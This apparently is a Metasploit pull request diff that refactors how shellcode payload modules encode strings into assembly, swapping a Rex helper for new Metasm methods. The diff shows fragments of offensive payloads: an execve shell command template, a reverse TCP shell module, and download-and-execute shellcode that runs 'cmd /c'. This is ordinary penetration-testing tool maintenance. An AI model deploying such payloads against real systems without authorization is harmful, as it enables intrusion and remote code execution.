### PR TITLE
Use Metasm::Shellcode.define_data/define_cstring for payload assembly

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -333,7 +333,7 @@ GEM
     mcp (0.13.0)
       json-schema (>= 4.1)
     memory_profiler (1.1.0)
-    metasm (1.0.5)
+    metasm (1.0.6)
     metasploit-concern (5.0.5)
       activemodel (~> 7.0)
       activesupport (~> 7.0)

--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -99,7 +99,7 @@ module MetasploitModule
         end
 
         # Null-free: raw bytes without terminator (patched at runtime)
-        cmd_bytes = Rex::Text.to_hex_cstring(cmd, nullbyte: false)
+        cmd_bytes = Metasm::Shellcode.define_data(cmd)
         if cmd_length <= 0xff # 255
           breg = 'bl'
         else
@@ -148,11 +148,11 @@ module MetasploitModule
             syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
           tocall:
             call afterjmp
-            db #{cmd_bytes}               ; arbitrary command
+            #{cmd_bytes}                  ; arbitrary command
         EOS
       else
         # Non-null-free: null-terminated cstring
-        cmd_cstring = Rex::Text.to_hex_cstring(cmd)
+        cmd_cstring = Metasm::Shellcode.define_cstring(cmd)
         # 37 bytes without cmd (not null-free)
         payload = <<-EOS
             mov rax, 0x68732f6e69622f
@@ -169,7 +169,7 @@ module MetasploitModule
 
             push rdx                ; NULL
             call continue
-            db #{cmd_cstring}         ; arbitrary command
+            #{cmd_cstring}            ; arbitrary command
           continue:
             push rsi                ; "-c"
             push rdi                ; "/bin/sh"

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -36,7 +36,7 @@ module MetasploitModule
     if length > 0xff
       fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
     end
-    hostname = Rex::Text.to_hex_cstring(hostname, nullbyte: false)
+    hostname = Metasm::Shellcode.define_data(hostname)
 
     payload = %^
       push 0xffffffffffffff56 ; sethostname() syscall number.
@@ -58,7 +58,7 @@ module MetasploitModule
 
     str:
       call end
-      db #{hostname}, 0x41
+      #{hostname}, 0x41
     ^
 
     Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string

--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -95,7 +95,7 @@ module MetasploitModule
         end
 
         # Null-free: raw bytes without terminator (patched at runtime)
-        cmd_bytes = Rex::Text.to_hex_cstring(cmd, nullbyte: false)
+        cmd_bytes = Metasm::Shellcode.define_data(cmd)
         if cmd_length <= 0xff # 255
           breg = 'bl'
         else
@@ -131,11 +131,11 @@ module MetasploitModule
             int 0x80
           tocall:
             call afterjmp          ; call/pop cmd address
-            db #{cmd_bytes}
+            #{cmd_bytes}
         EOS
       else
         # Non-null-free: null-terminated cstring
-        cmd_cstring = Rex::Text.to_hex_cstring(cmd)
+        cmd_cstring = Metasm::Shellcode.define_cstring(cmd)
         # 36 bytes without cmd (not null-free)
         payload = <<-EOS
             push 0xb
@@ -149,7 +149,7 @@ module MetasploitModule
             mov ebx, esp
             push edx
             call continue
-            db #{cmd_cstring}
+            #{cmd_cstring}
           continue:
             push edi
             push ebx

--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -34,7 +34,7 @@ module MetasploitModule
 
   def generate(_opts = {})
     fd = datastore['FD']
-    path = Rex::Text.to_hex_cstring(datastore['PATH'] || '')
+    path = Metasm::Shellcode.define_cstring(datastore['PATH'] || '')
 
     payload_data = <<-EOS
       jmp file
@@ -66,7 +66,7 @@ module MetasploitModule
 
       file:
         call open
-        db #{path}
+        #{path}
     EOS
 
     Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string

--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -43,7 +43,7 @@ module MetasploitModule
       raise ArgumentError, 'LHOST must be in IPv4 format.'
     end
 
-    cmd = Rex::Text.to_hex_cstring(datastore['CMD'] || '')
+    cmd = Metasm::Shellcode.define_cstring(datastore['CMD'] || '')
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
     encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
     encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
@@ -80,7 +80,7 @@ module MetasploitModule
       xor rax,rax
       mov eax,0x200003b
       call load_cmd
-      db #{cmd}
+      #{cmd}
     load_cmd:
       pop rdi
       xor rdx,rdx

--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -124,9 +124,9 @@ module MetasploitModule
 
     # get protocol specific stuff
 
-    server_uri = Rex::Text.to_hex_cstring(server_uri)
-    filename = Rex::Text.to_hex_cstring(filename)
-    server_host = Rex::Text.to_hex_cstring(server_host)
+    server_uri = Metasm::Shellcode.define_cstring(server_uri)
+    filename = Metasm::Shellcode.define_cstring(filename)
+    server_host = Metasm::Shellcode.define_cstring(server_host)
 
     # create actual payload
     payload_data = %^
@@ -226,7 +226,7 @@ module MetasploitModule
       call httpopenrequest
 
     server_uri:
-      db #{server_uri}
+      #{server_uri}
 
     create_file:
       jmp.i8 get_filename
@@ -297,13 +297,13 @@ module MetasploitModule
 
     get_filename:
       call get_filename_return
-      db #{filename}
+      #{filename}
 
     get_server_host:
       call internetconnect
 
     server_host:
-      db #{server_host}
+      #{server_host}
     end:
 ^
     self.assembly = payload_data

--- a/modules/payloads/singles/windows/messagebox.rb
+++ b/modules/payloads/singles/windows/messagebox.rb
@@ -40,8 +40,8 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
-    title = Rex::Text.to_hex_cstring(datastore['TITLE'] || '')
-    text = Rex::Text.to_hex_cstring(datastore['TEXT'] || '')
+    title = Metasm::Shellcode.define_cstring(datastore['TITLE'] || '')
+    text = Metasm::Shellcode.define_cstring(datastore['TEXT'] || '')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -91,10 +91,10 @@ module MetasploitModule
       call ebp
       push #{style}
       call get_title
-      db #{title}
+      #{title}
     get_title:
       call get_text
-      db #{text}
+      #{text}
     get_text:
       push 0
       push #{block_api_hash('user32.dll', 'MessageBoxA')}

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -42,8 +42,8 @@ module MetasploitModule
     display = datastore['DISPLAY'] || 'HIDE'
     url_length = url.bytesize
     file_length = file.bytesize
-    url = Rex::Text.to_hex_cstring(url, nullbyte: false)
-    file = Rex::Text.to_hex_cstring(file, nullbyte: false)
+    url = Metasm::Shellcode.define_data(url)
+    file = Metasm::Shellcode.define_data(file)
 
     payload = %^
             cld
@@ -65,13 +65,15 @@ module MetasploitModule
 
         SetUrl:
             call SetFile
-            db #{url}, 0x41
+            #{url}
+            db 0x41
 
         SetFile:
             pop rdx ; 2nd argument
             xor byte [rdx+#{url_length}], 'A' ; null terminator
             call UrlDownloadToFile
-            db #{file}, 0x43
+            #{file}
+            db 0x43
 
         UrlDownloadToFile:
             pop r8 ; 3rd argument
@@ -85,7 +87,9 @@ module MetasploitModule
 
         SetCommand:
             call Exec
-            db "cmd /c ", #{file}, 0x46
+            db "cmd /c "
+            #{file}
+            db 0x46
 
         Exec:
             pop rcx ; 1st argument

--- a/modules/payloads/singles/windows/x64/messagebox.rb
+++ b/modules/payloads/singles/windows/x64/messagebox.rb
@@ -36,8 +36,8 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    title = Rex::Text.to_hex_cstring(datastore['TITLE'] || '')
-    text = Rex::Text.to_hex_cstring(datastore['TEXT'] || '')
+    title = Metasm::Shellcode.define_cstring(datastore['TITLE'] || '')
+    text = Metasm::Shellcode.define_cstring(datastore['TEXT'] || '')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -90,11 +90,11 @@ module MetasploitModule
       call rbp
       mov r9, #{style}
       call get_text
-      db #{text}
+      #{text}
     get_text:
       pop rdx
       call get_title
-      db #{title}
+      #{title}
     get_title:
       pop r8
       xor rcx,rcx


### PR DESCRIPTION
Replaces all `Rex::Text.to_hex_cstring` calls in payload modules with the new `Metasm::Shellcode.define_data` and `Metasm::Shellcode.define_cstring` class methods, which emit full `db` directives (string-literal form for printable runs, hex tokens otherwise) and are a better home for assembly-source generation escape-aware encoding routines than rex-text.

Surrounding heredoc templates have the `db ` prefix removed since the new methods include it. Where a `db` directive previously combined an interpolated byte list with an additional literal (e.g. a trailing sentinel byte or `"cmd /c "`), the directive is split into adjacent `db` lines, which assemble to the same contiguous bytes.

Verified by re-running the `payload_cached_size_is_consistent` shared examples for each affected payload (30 examples, 0 failures), which were the tests originally fixed by #21424.

Requires rapid7/metasm#4

## Verification

- [ ] Verify tests pass
- [ ] Check one of the payloads `linux/x64/exec` covers both of the new functions, there should be no possible value of `CMD` that would prevent the assembly from being generated, furthermore the original bug whereby the payload would fail with `\` or `"` was present in the string should also not be present.